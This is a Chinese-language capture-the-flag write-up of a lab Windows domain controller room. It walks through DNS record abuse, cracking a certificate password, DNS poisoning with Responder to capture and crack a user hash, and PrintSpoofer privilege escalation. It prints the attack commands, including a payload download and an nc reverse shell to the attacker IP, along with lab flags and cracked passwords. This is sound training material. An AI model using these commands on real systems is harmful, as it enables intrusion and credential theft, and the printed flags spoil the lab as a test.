端口扫描

SMB枚举了一下没东西，估计和上一台靶机不一样了

DNS

照常添加hosts,三个域名都要添加。

开了53端口，是一个域服务器。试着挖掘一下DNS记录

dig windcorp.thm any @10.10.202.0

flag1

THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources}

提示:允许不安全的动态更新是一个重大的安全漏洞，因为可以从不受信任的来源接受更新

虽然不知道在说什么

主页进去右上角有一个登录界面

然而登录界面貌似有加密机制，不能直接爆破。扫一下目录，但是都扫出来的东西都没权限访问。这条路似乎走不通了。看看最后一个域名selfservice.dev.windcorp.thm的网站，提示正在建造，很有可能存在漏洞。

扫目录扫到一个backup目录，能够加载第一个证书，但是加密

pfx2john cert.pfx >hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

破解出密码是ganteng。到此为止是自己能做出来的部分了，接下来的步骤是根本没学过。

稍微去了解了一下pfx文件，简单来说就是有私钥和公钥证书，访问它需要私钥，也就是刚刚爆破出的东西。

要进行攻击我们要提取出公钥证书和私钥

openssl pkcs12 -in cert.pfx -nocerts -out private.pem -nodes

openssl pkcs12 -in cert.pfx -out public.pem -clcerts -nokeys

根据flag1中的提示，我们能够动态更新DNS记录。尝试

发现确实是替换了

然后攻击的思路就是，有一个在线用户会自动登录，我们拥有域名的私钥和公钥证书，于是可以使用DNS中毒，上面的步骤就是替换DNS的A记录为我们的kali攻击机地址（用于解析IPv4地址），来伪装拦截这个用户的哈希。

sudo cp private.pem public.pem /usr/share/responder/certs

先复制证书和私钥到responder的目录

sudo vim /etc/responder/Responder.conf

这房间打完记得改回来

sudo responder -I tun0

成功捕获哈希

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

爆破得到用户和密码

!Angelus25! (edwardle)

也许可以直接远程连接桌面，但是5985端口没开，用不了evil-winrm,但是开了3389，也可以用rpd来登录

想到了之前扫到的powershell界面还有selfservice可用户登录。发现可以在powershell界面登录

计算机名填fire,大概是因为这个域叫fire吧

flag2

THM{8a1d460dfe345f8edd09d45ae00e5c1c14d12c89}

到C盘根目录发现脚本已经被删了（笑）。

whoami /all

发现我们有SeImpersonatePrivilege特权,可以用printspoofer来提权，和本博客的第六台靶机提权方式相似

开启一个本地服务器用户上传，发现在downloads文件里已经有nc了，那传个printspoofer就好

powershell -c wget "http://10.14.52.15/PrintSpoofer64.exe" -outfile "PrintSpoofer64.exe"

开启监听

.\PrintSpoofer64.exe -c "nc.exe 10.14.52.15 1234 -e cmd"

成功提权

flag3

THM{9a8b9f4f3af2bce68885106c1c8473ab85e0eda0}

除了printspoofer，也有用sweetpotato的，可以看到downloads目录下有，用处应该差不多

对于https，DNS，证书之类的考察比较多，收货挺大。对于DNS中毒的原理做了一些了解，这个房间的难点应该就在这。提权倒是老朋友了，顺便复习一下。